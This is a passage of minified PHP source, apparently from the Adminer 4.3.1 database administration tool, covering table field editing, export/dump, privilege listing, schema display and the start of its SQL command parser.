name='".h($y)."[on_delete]'".(preg_match("~`~",$U)?"":" class='hidden'")."><option value=''>(".lang(94).")".optionlist(explode("|",$Te),$o["on_delete"])."</select> ":" ");}function
process_length($be){global$qc;return(preg_match("~^\\s*\\(?\\s*$qc(?:\\s*,\\s*$qc)*+\\s*\\)?\\s*\$~",$be)&&preg_match_all("~$qc~",$be,$ke)?"(".implode(",",$ke[0]).")":preg_replace('~^[0-9].*~','(\0)',preg_replace('~[^-0-9,+()[\]]~','',$be)));}function
process_type($o,$mb="COLLATE"){global$Yh;return" $o[type]".process_length($o["length"]).(preg_match('~(^|[^o])int|float|double|decimal~',$o["type"])&&in_array($o["unsigned"],$Yh)?" $o[unsigned]":"").(preg_match('~char|text|enum|set~',$o["type"])&&$o["collation"]?" $mb ".q($o["collation"]):"");}function
process_field($o,$Ph){global$x;$Mb=$o["default"];return
array(idf_escape(trim($o["field"])),process_type($Ph),($o["null"]?" NULL":" NOT NULL"),(isset($Mb)?" DEFAULT ".((preg_match('~time~',$o["type"])&&preg_match('~^CURRENT_TIMESTAMP$~i',$Mb))||($x=="sqlite"&&preg_match('~^CURRENT_(TIME|TIMESTAMP|DATE)$~i',$Mb))||($o["type"]=="bit"&&preg_match("~^([0-9]+|b'[0-1]+')\$~",$Mb))||($x=="pgsql"&&preg_match("~^[a-z]+\\(('[^']*')+\\)\$~",$Mb))?$Mb:q($Mb)):""),(preg_match('~timestamp|datetime~',$o["type"])&&$o["on_update"]?" ON UPDATE $o[on_update]":""),(support("comment")&&$o["comment"]!=""?" COMMENT ".q($o["comment"]):""),($o["auto_increment"]?auto_increment():null),);}function
type_class($U){foreach(array('char'=>'text','date'=>'time|year','binary'=>'blob','enum'=>'set',)as$y=>$X){if(preg_match("~$y|$X~",$U))return" class='$y'";}}function
edit_fields($p,$ob,$U="TABLE",$Tc=array(),$tb=false){global$g,$yd;$p=array_values($p);echo'<thead><tr class="wrap">
';if($U=="PROCEDURE"){echo'<td> ';}echo'<th id="label-name">',($U=="TABLE"?lang(95):lang(96)),'<td id="label-type">',lang(46),'<textarea id="enum-edit" rows="4" cols="12" wrap="off" style="display: none;" onblur="editingLengthBlur(this);"></textarea>
<td id="label-length">',lang(97),'<td>',lang(98);if($U=="TABLE"){echo'<td id="label-null">NULL
<td><input type="radio" name="auto_increment_col" value=""><acronym id="label-ai" title="',lang(48),'">AI</acronym>',doc_link(array('sql'=>"example-auto-increment.html",'sqlite'=>"autoinc.html",'pgsql'=>"datatype.html#DATATYPE-SERIAL",'mssql'=>"ms186775.aspx",)),'<td id="label-default">',lang(49),(support("comment")?"<td id='label-comment'".($tb?"":" class='hidden'").">".lang(47):"");}echo'<td>',"<input type='image' class='icon' name='add[".(support("move_col")?0:count($p))."]' src='".h(preg_replace("~\\?.*~","",ME))."?file=plus.gif&version=4.3.1' alt='+' title='".lang(99)."'>",'<script type="text/javascript">row_count = ',count($p),';</script>
</thead>
<tbody onkeydown="return editingKeydown(event);">
';foreach($p
as$s=>$o){$s++;$hf=$o[($_POST?"orig":"field")];$Tb=(isset($_POST["add"][$s-1])||(isset($o["field"])&&!$_POST["drop_col"][$s]))&&(support("drop_col")||$hf=="");echo'<tr',($Tb?"":" style='display: none;'"),'>
',($U=="PROCEDURE"?"<td>".html_select("fields[$s][inout]",explode("|",$yd),$o["inout"]):""),'<th>';if($Tb){echo'<input name="fields[',$s,'][field]" value="',h($o["field"]),'" onchange="editingNameChange(this);',($o["field"]!=""||count($p)>1?'':' editingAddRow(this);" onkeyup="if (this.value) editingAddRow(this);'),'" maxlength="64" autocapitalize="off" aria-labelledby="label-name">';}echo'<input type="hidden" name="fields[',$s,'][orig]" value="',h($hf),'">
';edit_type("fields[$s]",$o,$ob,$Tc);if($U=="TABLE"){echo'<td>',checkbox("fields[$s][null]",1,$o["null"],"","","block","label-null"),'<td><label class="block"><input type="radio" name="auto_increment_col" value="',$s,'"';if($o["auto_increment"]){echo' checked';}?> onclick="var field = this.form['fields[' + this.value + '][field]']; if (!field.value) { field.value = 'id'; field.onchange(); }" aria-labelledby="label-ai"></label><td><?php
echo
checkbox("fields[$s][has_default]",1,$o["has_default"],"","","","label-default"),'<input name="fields[',$s,'][default]" value="',h($o["default"]),'" onkeyup="keyupChange.call(this);" onchange="this.previousSibling.checked = true;" aria-labelledby="label-default">
',(support("comment")?"<td".($tb?"":" class='hidden'")."><input name='fields[$s][comment]' value='".h($o["comment"])."' maxlength='".($g->server_info>=5.5?1024:255)."' aria-labelledby='label-comment'>":"");}echo"<td>",(support("move_col")?"<input type='image' class='icon' name='add[$s]' src='".h(preg_replace("~\\?.*~","",ME))."?file=plus.gif&version=4.3.1' alt='+' title='".lang(99)."' onclick='return !editingAddRow(this, 1);'> "."<input type='image' class='icon' name='up[$s]' src='".h(preg_replace("~\\?.*~","",ME))."?file=up.gif&version=4.3.1' alt='^' title='".lang(100)."' onclick='return !editingMoveRow(this, 1);'> "."<input type='image' class='icon' name='down[$s]' src='".h(preg_replace("~\\?.*~","",ME))."?file=down.gif&version=4.3.1' alt='v' title='".lang(101)."' onclick='return !editingMoveRow(this, 0);'> ":""),($hf==""||support("drop_col")?"<input type='image' class='icon' name='drop_col[$s]' src='".h(preg_replace("~\\?.*~","",ME))."?file=cross.gif&version=4.3.1' alt='x' title='".lang(102)."' onclick=\"return !editingRemoveRow(this, 'fields\$1[field]');\">":""),"\n";}}function
process_fields(&$p){$D=0;if($_POST["up"]){$Vd=0;foreach($p
as$y=>$o){if(key($_POST["up"])==$y){unset($p[$y]);array_splice($p,$Vd,0,array($o));break;}if(isset($o["field"]))$Vd=$D;$D++;}}elseif($_POST["down"]){$Vc=false;foreach($p
as$y=>$o){if(isset($o["field"])&&$Vc){unset($p[key($_POST["down"])]);array_splice($p,$D,0,array($Vc));break;}if(key($_POST["down"])==$y)$Vc=$o;$D++;}}elseif($_POST["add"]){$p=array_values($p);array_splice($p,key($_POST["add"]),0,array(array()));}elseif(!$_POST["drop_col"])return
false;return
true;}function
normalize_enum($B){return"'".str_replace("'","''",addcslashes(stripcslashes(str_replace($B[0][0].$B[0][0],$B[0][0],substr($B[0],1,-1))),'\\'))."'";}function
grant($ad,$Pf,$e,$Se){if(!$Pf)return
true;if($Pf==array("ALL PRIVILEGES","GRANT OPTION"))return($ad=="GRANT"?queries("$ad ALL PRIVILEGES$Se WITH GRANT OPTION"):queries("$ad ALL PRIVILEGES$Se")&&queries("$ad GRANT OPTION$Se"));return
queries("$ad ".preg_replace('~(GRANT OPTION)\\([^)]*\\)~','\\1',implode("$e, ",$Pf).$e).$Se);}function
drop_create($Zb,$i,$ac,$sh,$cc,$A,$ve,$te,$ue,$Pe,$Fe){if($_POST["drop"])query_redirect($Zb,$A,$ve);elseif($Pe=="")query_redirect($i,$A,$ue);elseif($Pe!=$Fe){$Db=queries($i);queries_redirect($A,$te,$Db&&queries($Zb));if($Db)queries($ac);}else
queries_redirect($A,$te,queries($sh)&&queries($cc)&&queries($Zb)&&queries($i));}function
create_trigger($Se,$K){global$x;$xh=" $K[Timing] $K[Event]".($K["Event"]=="UPDATE OF"?" ".idf_escape($K["Of"]):"");return"CREATE TRIGGER ".idf_escape($K["Trigger"]).($x=="mssql"?$Se.$xh:$xh.$Se).rtrim(" $K[Type]\n$K[Statement]",";").";";}function
create_routine($rg,$K){global$yd;$O=array();$p=(array)$K["fields"];ksort($p);foreach($p
as$o){if($o["field"]!="")$O[]=(preg_match("~^($yd)\$~",$o["inout"])?"$o[inout] ":"").idf_escape($o["field"]).process_type($o,"CHARACTER SET");}return"CREATE $rg ".idf_escape(trim($K["name"]))." (".implode(", ",$O).")".(isset($_GET["function"])?" RETURNS".process_type($K["returns"],"CHARACTER SET"):"").($K["language"]?" LANGUAGE $K[language]":"").rtrim("\n$K[definition]",";").";";}function
remove_definer($H){return
preg_replace('~^([A-Z =]+) DEFINER=`'.preg_replace('~@(.*)~','`@`(%|\\1)',logged_user()).'`~','\\1',$H);}function
format_foreign_key($q){global$Te;return" FOREIGN KEY (".implode(", ",array_map('idf_escape',$q["source"])).") REFERENCES ".table($q["table"])." (".implode(", ",array_map('idf_escape',$q["target"])).")".(preg_match("~^($Te)\$~",$q["on_delete"])?" ON DELETE $q[on_delete]":"").(preg_match("~^($Te)\$~",$q["on_update"])?" ON UPDATE $q[on_update]":"");}function
tar_file($Kc,$Bh){$J=pack("a100a8a8a8a12a12",$Kc,644,0,0,decoct($Bh->size),decoct(time()));$fb=8*32;for($s=0;$s<strlen($J);$s++)$fb+=ord($J[$s]);$J.=sprintf("%06o",$fb)."\0 ";echo$J,str_repeat("\0",512-strlen($J));$Bh->send();echo
str_repeat("\0",511-($Bh->size+511)%512);}function
ini_bytes($xd){$X=ini_get($xd);switch(strtolower(substr($X,-1))){case'g':$X*=1024;case'm':$X*=1024;case'k':$X*=1024;}return$X;}function
doc_link($_f){global$x,$g;$ci=array('sql'=>"http://dev.mysql.com/doc/refman/".substr($g->server_info,0,3)."/en/",'sqlite'=>"http://www.sqlite.org/",'pgsql'=>"http://www.postgresql.org/docs/".substr($g->server_info,0,3)."/static/",'mssql'=>"http://msdn.microsoft.com/library/",'oracle'=>"http://download.oracle.com/docs/cd/B19306_01/server.102/b14200/",);return($_f[$x]?"<a href='$ci[$x]$_f[$x]' target='_blank' rel='noreferrer'><sup>?</sup></a>":"");}function
ob_gzencode($Q){return
gzencode($Q);}function
db_size($m){global$g;if(!$g->select_db($m))return"?";$J=0;foreach(table_status()as$S)$J+=$S["Data_length"]+$S["Index_length"];return
format_number($J);}function
set_utf8mb4($i){global$g;static$O=false;if(!$O&&preg_match('~\butf8mb4~i',$i)){$O=true;echo"SET NAMES ".charset($g).";\n\n";}}function
connect_error(){global$b,$g,$Dh,$n,$Yb;if(DB!=""){header("HTTP/1.1 404 Not Found");page_header(lang(35).": ".h(DB),lang(103),true);}else{if($_POST["db"]&&!$n)queries_redirect(substr(ME,0,-1),lang(104),drop_databases($_POST["db"]));page_header(lang(105),$n,false);echo"<p class='links'>\n";foreach(array('database'=>lang(106),'privileges'=>lang(68),'processlist'=>lang(107),'variables'=>lang(108),'status'=>lang(109),'replication'=>lang(110),)as$y=>$X){if(support($y))echo"<a href='".h(ME)."$y='>$X</a>\n";}echo"<p>".lang(111,$Yb[DRIVER],"<b>".h($g->server_info)."</b>","<b>$g->extension</b>")."\n","<p>".lang(112,"<b>".h(logged_user())."</b>")."\n";$l=$b->databases();if($l){$yg=support("scheme");$ob=collations();echo"<form action='' method='post'>\n","<table cellspacing='0' class='checkable' onclick='tableClick(event);' ondblclick='tableClick(event, true);'>\n","<thead><tr>".(support("database")?"<td> ":"")."<th>".lang(35)." - <a href='".h(ME)."refresh=1'>".lang(113)."</a>"."<td>".lang(114)."<td>".lang(115)."<td>".lang(116)." - <a href='".h(ME)."dbsize=1' onclick=\"return !ajaxSetHtml('".h(js_escape(ME))."script=connect');\">".lang(117)."</a>"."</thead>\n";$l=($_GET["dbsize"]?count_tables($l):array_flip($l));foreach($l
as$m=>$T){$qg=h(ME)."db=".urlencode($m);$t=h("Db-".$m);echo"<tr".odd().">".(support("database")?"<td>".checkbox("db[]",$m,in_array($m,(array)$_POST["db"]),"","","",$t):""),"<th><a href='$qg' id='$m'>".h($m)."</a>";$nb=nbsp(db_collation($m,$ob));echo"<td>".(support("database")?"<a href='$qg".($yg?"&ns=":"")."&database=' title='".lang(64)."'>$nb</a>":$nb),"<td align='right'><a href='$qg&schema=' id='tables-".h($m)."' title='".lang(67)."'>".($_GET["dbsize"]?$T:"?")."</a>","<td align='right' id='size-".h($m)."'>".($_GET["dbsize"]?db_size($m):"?"),"\n";}echo"</table>\n",(support("database")?"<fieldset><legend>".lang(118)." <span id='selected'></span></legend><div>\n"."<input type='hidden' name='all' value='' onclick=\"selectCount('selected', formChecked(this, /^db/));\">\n"."<input type='submit' name='drop' value='".lang(119)."'".confirm().">\n"."</div></fieldset>\n":""),"<script type='text/javascript'>tableCheck();</script>\n","<input type='hidden' name='token' value='$Dh'>\n","</form>\n";}}page_footer("db");}if(isset($_GET["status"]))$_GET["variables"]=$_GET["status"];if(isset($_GET["import"]))$_GET["sql"]=$_GET["import"];if(!(DB!=""?$g->select_db(DB):isset($_GET["sql"])||isset($_GET["dump"])||isset($_GET["database"])||isset($_GET["processlist"])||isset($_GET["privileges"])||isset($_GET["user"])||isset($_GET["replication"])||isset($_GET["variables"])||$_GET["script"]=="connect"||$_GET["script"]=="kill")){if(DB!=""||$_GET["refresh"]){restart_session();set_session("dbs",null);}connect_error();exit;}if(support("scheme")&&DB!=""&&$_GET["ns"]!==""){if(!isset($_GET["ns"]))redirect(preg_replace('~ns=[^&]*&~','',ME)."ns=".get_schema());if(!set_schema($_GET["ns"])){header("HTTP/1.1 404 Not Found");page_header(lang(73).": ".h($_GET["ns"]),lang(120),true);page_footer("ns");exit;}}$Te="RESTRICT|NO ACTION|CASCADE|SET NULL|SET DEFAULT";class
TmpFile{var$handler;var$size;function
__construct(){$this->handler=tmpfile();}function
write($yb){$this->size+=strlen($yb);fwrite($this->handler,$yb);}function
send(){fseek($this->handler,0);fpassthru($this->handler);fclose($this->handler);}}$qc="'(?:''|[^'\\\\]|\\\\.)*'";$yd="IN|OUT|INOUT";if(isset($_GET["select"])&&($_POST["edit"]||$_POST["clone"])&&!$_POST["save"])$_GET["edit"]=$_GET["select"];if(isset($_GET["callf"]))$_GET["call"]=$_GET["callf"];if(isset($_GET["function"]))$_GET["procedure"]=$_GET["function"];if(isset($_GET["download"])){$a=$_GET["download"];$p=fields($a);header("Content-Type: application/octet-stream");header("Content-Disposition: attachment; filename=".friendly_url("$a-".implode("_",$_GET["where"])).".".friendly_url($_GET["field"]));$M=array(idf_escape($_GET["field"]));$I=$Xb->select($a,$M,array(where($_GET,$p)),$M);$K=($I?$I->fetch_row():array());echo$K[0];exit;}elseif(isset($_GET["table"])){$a=$_GET["table"];$p=fields($a);if(!$p)$n=error();$S=table_status1($a,true);page_header(($p&&is_view($S)?$S['Engine']=='materialized view'?lang(121):lang(122):lang(123)).": ".h($a),$n);$b->selectLinks($S);$sb=$S["Comment"];if($sb!="")echo"<p>".lang(47).": ".h($sb)."\n";if($p)$b->tableStructurePrint($p);if(!is_view($S)){if(support("indexes")){echo"<h3 id='indexes'>".lang(124)."</h3>\n";$w=indexes($a);if($w)$b->tableIndexesPrint($w);echo'<p class="links"><a href="'.h(ME).'indexes='.urlencode($a).'">'.lang(125)."</a>\n";}if(fk_support($S)){echo"<h3 id='foreign-keys'>".lang(91)."</h3>\n";$Tc=foreign_keys($a);if($Tc){echo"<table cellspacing='0'>\n","<thead><tr><th>".lang(126)."<td>".lang(127)."<td>".lang(94)."<td>".lang(93)."<td> </thead>\n";foreach($Tc
as$C=>$q){echo"<tr title='".h($C)."'>","<th><i>".implode("</i>, <i>",array_map('h',$q["source"]))."</i>","<td><a href='".h($q["db"]!=""?preg_replace('~db=[^&]*~',"db=".urlencode($q["db"]),ME):($q["ns"]!=""?preg_replace('~ns=[^&]*~',"ns=".urlencode($q["ns"]),ME):ME))."table=".urlencode($q["table"])."'>".($q["db"]!=""?"<b>".h($q["db"])."</b>.":"").($q["ns"]!=""?"<b>".h($q["ns"])."</b>.":"").h($q["table"])."</a>","(<i>".implode("</i>, <i>",array_map('h',$q["target"]))."</i>)","<td>".nbsp($q["on_delete"])."\n","<td>".nbsp($q["on_update"])."\n",'<td><a href="'.h(ME.'foreign='.urlencode($a).'&name='.urlencode($C)).'">'.lang(128).'</a>';}echo"</table>\n";}echo'<p class="links"><a href="'.h(ME).'foreign='.urlencode($a).'">'.lang(129)."</a>\n";}}if(support(is_view($S)?"view_trigger":"trigger")){echo"<h3 id='triggers'>".lang(130)."</h3>\n";$Oh=triggers($a);if($Oh){echo"<table cellspacing='0'>\n";foreach($Oh
as$y=>$X)echo"<tr valign='top'><td>".h($X[0])."<td>".h($X[1])."<th>".h($y)."<td><a href='".h(ME.'trigger='.urlencode($a).'&name='.urlencode($y))."'>".lang(128)."</a>\n";echo"</table>\n";}echo'<p class="links"><a href="'.h(ME).'trigger='.urlencode($a).'">'.lang(131)."</a>\n";}}elseif(isset($_GET["schema"])){page_header(lang(67),"",array(),h(DB.($_GET["ns"]?".$_GET[ns]":"")));$ih=array();$jh=array();$ea=($_GET["schema"]?$_GET["schema"]:$_COOKIE["adminer_schema-".str_replace(".","_",DB)]);preg_match_all('~([^:]+):([-0-9.]+)x([-0-9.]+)(_|$)~',$ea,$ke,PREG_SET_ORDER);foreach($ke
as$s=>$B){$ih[$B[1]]=array($B[2],$B[3]);$jh[]="\n\t'".js_escape($B[1])."': [ $B[2], $B[3] ]";}$Eh=0;$Qa=-1;$xg=array();$eg=array();$Zd=array();foreach(table_status('',true)as$R=>$S){if(is_view($S))continue;$Ef=0;$xg[$R]["fields"]=array();foreach(fields($R)as$C=>$o){$Ef+=1.25;$o["pos"]=$Ef;$xg[$R]["fields"][$C]=$o;}$xg[$R]["pos"]=($ih[$R]?$ih[$R]:array($Eh,0));foreach($b->foreignKeys($R)as$X){if(!$X["db"]){$Xd=$Qa;if($ih[$R][1]||$ih[$X["table"]][1])$Xd=min(floatval($ih[$R][1]),floatval($ih[$X["table"]][1]))-1;else$Qa-=.1;while($Zd[(string)$Xd])$Xd-=.0001;$xg[$R]["references"][$X["table"]][(string)$Xd]=array($X["source"],$X["target"]);$eg[$X["table"]][$R][(string)$Xd]=$X["target"];$Zd[(string)$Xd]=true;}}$Eh=max($Eh,$xg[$R]["pos"][0]+2.5+$Ef);}echo'<div id="schema" style="height: ',$Eh,'em;" onselectstart="return false;">
<script type="text/javascript">
var tablePos = {',implode(",",$jh)."\n",'};
var em = document.getElementById(\'schema\').offsetHeight / ',$Eh,';
document.onmousemove = schemaMousemove;
document.onmouseup = function (ev) {
schemaMouseup(ev, \'',js_escape(DB),'\');
};
</script>
';foreach($xg
as$C=>$R){echo"<div class='table' style='top: ".$R["pos"][0]."em; left: ".$R["pos"][1]."em;' onmousedown='schemaMousedown(this, event);'>",'<a href="'.h(ME).'table='.urlencode($C).'"><b>'.h($C)."</b></a>";foreach($R["fields"]as$o){$X='<span'.type_class($o["type"]).' title="'.h($o["full_type"].($o["null"]?" NULL":'')).'">'.h($o["field"]).'</span>';echo"<br>".($o["primary"]?"<i>$X</i>":$X);}foreach((array)$R["references"]as$ph=>$fg){foreach($fg
as$Xd=>$bg){$Yd=$Xd-$ih[$C][1];$s=0;foreach($bg[0]as$Qg)echo"\n<div class='references' title='".h($ph)."' id='refs$Xd-".($s++)."' style='left: $Yd"."em; top: ".$R["fields"][$Qg]["pos"]."em; padding-top: .5em;'><div style='border-top: 1px solid Gray; width: ".(-$Yd)."em;'></div></div>";}}foreach((array)$eg[$C]as$ph=>$fg){foreach($fg
as$Xd=>$e){$Yd=$Xd-$ih[$C][1];$s=0;foreach($e
as$oh)echo"\n<div class='references' title='".h($ph)."' id='refd$Xd-".($s++)."' style='left: $Yd"."em; top: ".$R["fields"][$oh]["pos"]."em; height: 1.25em; background: url(".h(preg_replace("~\\?.*~","",ME))."?file=arrow.gif) no-repeat right center;&version=4.3.1'><div style='height: .5em; border-bottom: 1px solid Gray; width: ".(-$Yd)."em;'></div></div>";}}echo"\n</div>\n";}foreach($xg
as$C=>$R){foreach((array)$R["references"]as$ph=>$fg){foreach($fg
as$Xd=>$bg){$ze=$Eh;$oe=-10;foreach($bg[0]as$y=>$Qg){$Ff=$R["pos"][0]+$R["fields"][$Qg]["pos"];$Gf=$xg[$ph]["pos"][0]+$xg[$ph]["fields"][$bg[1][$y]]["pos"];$ze=min($ze,$Ff,$Gf);$oe=max($oe,$Ff,$Gf);}echo"<div class='references' id='refl$Xd' style='left: $Xd"."em; top: $ze"."em; padding: .5em 0;'><div style='border-right: 1px solid Gray; margin-top: 1px; height: ".($oe-$ze)."em;'></div></div>\n";}}}echo'</div>
<p class="links"><a href="',h(ME."schema=".urlencode($ea)),'" id="schema-link">',lang(132),'</a>
';}elseif(isset($_GET["dump"])){$a=$_GET["dump"];if($_POST&&!$n){$Ab="";foreach(array("output","format","db_style","routines","events","table_style","auto_increment","triggers","data_style")as$y)$Ab.="&$y=".urlencode($_POST[$y]);cookie("adminer_export",substr($Ab,1));$T=array_flip((array)$_POST["tables"])+array_flip((array)$_POST["data"]);$Bc=dump_headers((count($T)==1?key($T):DB),(DB==""||count($T)>1));$Fd=preg_match('~sql~',$_POST["format"]);if($Fd){echo"-- Adminer $ia ".$Yb[DRIVER]." dump\n\n";if($x=="sql"){echo"SET NAMES utf8;
SET time_zone = '+00:00';
".($_POST["data_style"]?"SET foreign_key_checks = 0;
SET sql_mode = 'NO_AUTO_VALUE_ON_ZERO';
":"")."
";$g->query("SET time_zone = '+00:00';");}}$Zg=$_POST["db_style"];$l=array(DB);if(DB==""){$l=$_POST["databases"];if(is_string($l))$l=explode("\n",rtrim(str_replace("\r","",$l),"\n"));}foreach((array)$l
as$m){$b->dumpDatabase($m);if($g->select_db($m)){if($Fd&&preg_match('~CREATE~',$Zg)&&($i=$g->result("SHOW CREATE DATABASE ".idf_escape($m),1))){set_utf8mb4($i);if($Zg=="DROP+CREATE")echo"DROP DATABASE IF EXISTS ".idf_escape($m).";\n";echo"$i;\n";}if($Fd){if($Zg)echo
use_sql($m).";\n\n";$nf="";if($_POST["routines"]){foreach(array("FUNCTION","PROCEDURE")as$rg){foreach(get_rows("SHOW $rg STATUS WHERE Db = ".q($m),null,"-- ")as$K){$i=remove_definer($g->result("SHOW CREATE $rg ".idf_escape($K["Name"]),2));set_utf8mb4($i);$nf.=($Zg!='DROP+CREATE'?"DROP $rg IF EXISTS ".idf_escape($K["Name"]).";;\n":"")."$i;;\n\n";}}}if($_POST["events"]){foreach(get_rows("SHOW EVENTS",null,"-- ")as$K){$i=remove_definer($g->result("SHOW CREATE EVENT ".idf_escape($K["Name"]),3));set_utf8mb4($i);$nf.=($Zg!='DROP+CREATE'?"DROP EVENT IF EXISTS ".idf_escape($K["Name"]).";;\n":"")."$i;;\n\n";}}if($nf)echo"DELIMITER ;;\n\n$nf"."DELIMITER ;\n\n";}if($_POST["table_style"]||$_POST["data_style"]){$oi=array();foreach(table_status('',true)as$C=>$S){$R=(DB==""||in_array($C,(array)$_POST["tables"]));$Gb=(DB==""||in_array($C,(array)$_POST["data"]));if($R||$Gb){if($Bc=="tar"){$Bh=new
TmpFile;ob_start(array($Bh,'write'),1e5);}$b->dumpTable($C,($R?$_POST["table_style"]:""),(is_view($S)?2:0));if(is_view($S))$oi[]=$C;elseif($Gb){$p=fields($C);$b->dumpData($C,$_POST["data_style"],"SELECT *".convert_fields($p,$p)." FROM ".table($C));}if($Fd&&$_POST["triggers"]&&$R&&($Oh=trigger_sql($C,$_POST["table_style"])))echo"\nDELIMITER ;;\n$Oh\nDELIMITER ;\n";if($Bc=="tar"){ob_end_flush();tar_file((DB!=""?"":"$m/")."$C.csv",$Bh);}elseif($Fd)echo"\n";}}foreach($oi
as$ni)$b->dumpTable($ni,$_POST["table_style"],1);if($Bc=="tar")echo
pack("x512");}}}if($Fd)echo"-- ".$g->result("SELECT NOW()")."\n";exit;}page_header(lang(70),$n,($_GET["export"]!=""?array("table"=>$_GET["export"]):array()),h(DB));echo'
<form action="" method="post">
<table cellspacing="0">
';$Jb=array('','USE','DROP+CREATE','CREATE');$kh=array('','DROP+CREATE','CREATE');$Hb=array('','TRUNCATE+INSERT','INSERT');if($x=="sql")$Hb[]='INSERT+UPDATE';parse_str($_COOKIE["adminer_export"],$K);if(!$K)$K=array("output"=>"text","format"=>"sql","db_style"=>(DB!=""?"":"CREATE"),"table_style"=>"DROP+CREATE","data_style"=>"INSERT");if(!isset($K["events"])){$K["routines"]=$K["events"]=($_GET["dump"]=="");$K["triggers"]=$K["table_style"];}echo"<tr><th>".lang(133)."<td>".html_select("output",$b->dumpOutput(),$K["output"],0)."\n";echo"<tr><th>".lang(134)."<td>".html_select("format",$b->dumpFormat(),$K["format"],0)."\n";echo($x=="sqlite"?"":"<tr><th>".lang(35)."<td>".html_select('db_style',$Jb,$K["db_style"]).(support("routine")?checkbox("routines",1,$K["routines"],lang(135)):"").(support("event")?checkbox("events",1,$K["events"],lang(136)):"")),"<tr><th>".lang(115)."<td>".html_select('table_style',$kh,$K["table_style"]).checkbox("auto_increment",1,$K["auto_increment"],lang(48)).(support("trigger")?checkbox("triggers",1,$K["triggers"],lang(130)):""),"<tr><th>".lang(137)."<td>".html_select('data_style',$Hb,$K["data_style"]),'</table>
<p><input type="submit" value="',lang(70),'">
<input type="hidden" name="token" value="',$Dh,'">
<table cellspacing="0">
';$Jf=array();if(DB!=""){$db=($a!=""?"":" checked");echo"<thead><tr>","<th style='text-align: left;'><label class='block'><input type='checkbox' id='check-tables'$db onclick='formCheck(this, /^tables\\[/);'>".lang(115)."</label>","<th style='text-align: right;'><label class='block'>".lang(137)."<input type='checkbox' id='check-data'$db onclick='formCheck(this, /^data\\[/);'></label>","</thead>\n";$oi="";$lh=tables_list();foreach($lh
as$C=>$U){$If=preg_replace('~_.*~','',$C);$db=($a==""||$a==(substr($a,-1)=="%"?"$If%":$C));$Mf="<tr><td>".checkbox("tables[]",$C,$db,$C,"checkboxClick(event, this); formUncheck('check-tables');","block");if($U!==null&&!preg_match('~table~i',$U))$oi.="$Mf\n";else
echo"$Mf<td align='right'><label class='block'><span id='Rows-".h($C)."'></span>".checkbox("data[]",$C,$db,"","checkboxClick(event, this); formUncheck('check-data');")."</label>\n";$Jf[$If]++;}echo$oi;if($lh)echo"<script type='text/javascript'>ajaxSetHtml('".js_escape(ME)."script=db');</script>\n";}else{echo"<thead><tr><th style='text-align: left;'><label class='block'><input type='checkbox' id='check-databases'".($a==""?" checked":"")." onclick='formCheck(this, /^databases\\[/);'>".lang(35)."</label></thead>\n";$l=$b->databases();if($l){foreach($l
as$m){if(!information_schema($m)){$If=preg_replace('~_.*~','',$m);echo"<tr><td>".checkbox("databases[]",$m,$a==""||$a=="$If%",$m,"formUncheck('check-databases');","block")."\n";$Jf[$If]++;}}}else
echo"<tr><td><textarea name='databases' rows='10' cols='20'></textarea>";}echo'</table>
</form>
';$Mc=true;foreach($Jf
as$y=>$X){if($y!=""&&$X>1){echo($Mc?"<p>":" ")."<a href='".h(ME)."dump=".urlencode("$y%")."'>".h($y)."</a>";$Mc=false;}}}elseif(isset($_GET["privileges"])){page_header(lang(68));echo'<p class="links"><a href="'.h(ME).'user=">'.lang(138)."</a>";$I=$g->query("SELECT User, Host FROM mysql.".(DB==""?"user":"db WHERE ".q(DB)." LIKE Db")." ORDER BY Host, User");$ad=$I;if(!$I)$I=$g->query("SELECT SUBSTRING_INDEX(CURRENT_USER, '@', 1) AS User, SUBSTRING_INDEX(CURRENT_USER, '@', -1) AS Host");echo"<form action=''><p>\n";hidden_fields_get();echo"<input type='hidden' name='db' value='".h(DB)."'>\n",($ad?"":"<input type='hidden' name='grant' value=''>\n"),"<table cellspacing='0'>\n","<thead><tr><th>".lang(33)."<th>".lang(32)."<th> </thead>\n";while($K=$I->fetch_assoc())echo'<tr'.odd().'><td>'.h($K["User"])."<td>".h($K["Host"]).'<td><a href="'.h(ME.'user='.urlencode($K["User"]).'&host='.urlencode($K["Host"])).'">'.lang(10)."</a>\n";if(!$ad||DB!="")echo"<tr".odd()."><td><input name='user' autocapitalize='off'><td><input name='host' value='localhost' autocapitalize='off'><td><input type='submit' value='".lang(10)."'>\n";echo"</table>\n","</form>\n";}elseif(isset($_GET["sql"])){if(!$n&&$_POST["export"]){dump_headers("sql");$b->dumpTable("","");$b->dumpData("","table",$_POST["query"]);exit;}restart_session();$kd=&get_session("queries");$jd=&$kd[DB];if(!$n&&$_POST["clear"]){$jd=array();redirect(remove_from_uri("history"));}page_header((isset($_GET["import"])?lang(69):lang(61)),$n);if(!$n&&$_POST){$Xc=false;if(!isset($_GET["import"]))$H=$_POST["query"];elseif($_POST["webfile"]){$Xc=@fopen((file_exists("adminer.sql")?"adminer.sql":"compress.zlib://adminer.sql.gz"),"rb");$H=($Xc?fread($Xc,1e6):false);}else$H=get_file("sql_file",true);if(is_string($H)){if(function_exists('memory_get_usage'))@ini_set("memory_limit",max(ini_bytes("memory_limit"),2*strlen($H)+memory_get_usage()+8e6));if($H!=""&&strlen($H)<1e6){$Tf=$H.(preg_match("~;[ \t\r\n]*\$~",$H)?"":";");if(!$jd||reset(end($jd))!=$Tf){restart_session();$jd[]=array($Tf,time());set_session("queries",$kd);stop_session();}}$Rg="(?:\\s|/\\*[\s\S]*?\\*/|(?:#|-- )[^\n]*\n?|--\r?\n)";$Ob=";";$D=0;$nc=true;$h=connect();if(is_object($h)&&DB!="")$h->select_db(DB);$rb=0;$sc=array();$sf='[\'"'.($x=="sql"?'`#':($x=="sqlite"?'`[':($x=="mssql"?'[':''))).']|/\\*|-- |$'.($x=="pgsql"?'|\\$[^$]*\\$':'');$Fh=microtime(true);parse_str($_COOKIE["adminer_export"],$xa);$ec=$b->dumpFormat();unset($ec["sql"]);while($H!=""){if(!$D&&preg_match("~^$Rg*+DELIMITER\\s+(\\S+)~i",$H,$B)){$Ob=$B[1];$H=substr($H,strlen($B[0]));}else{preg_match('('.preg_quote($Ob)."\\s*|$sf)",$H,$B,PREG_OFFSET_CAPTURE,$D);list($Vc,$Ef)=$B[0];if(!$Vc&&$Xc&&!feof($Xc))$H.=fread($Xc,1e5);else{if(!$Vc&&rtrim($H)=="")break;$D=$Ef+strlen($Vc);if($Vc&&rtrim($Vc)!=$Ob){while(preg_match('('.($Vc=='/*'?'\\*/':($Vc=='['?']':(preg_match('~^-- 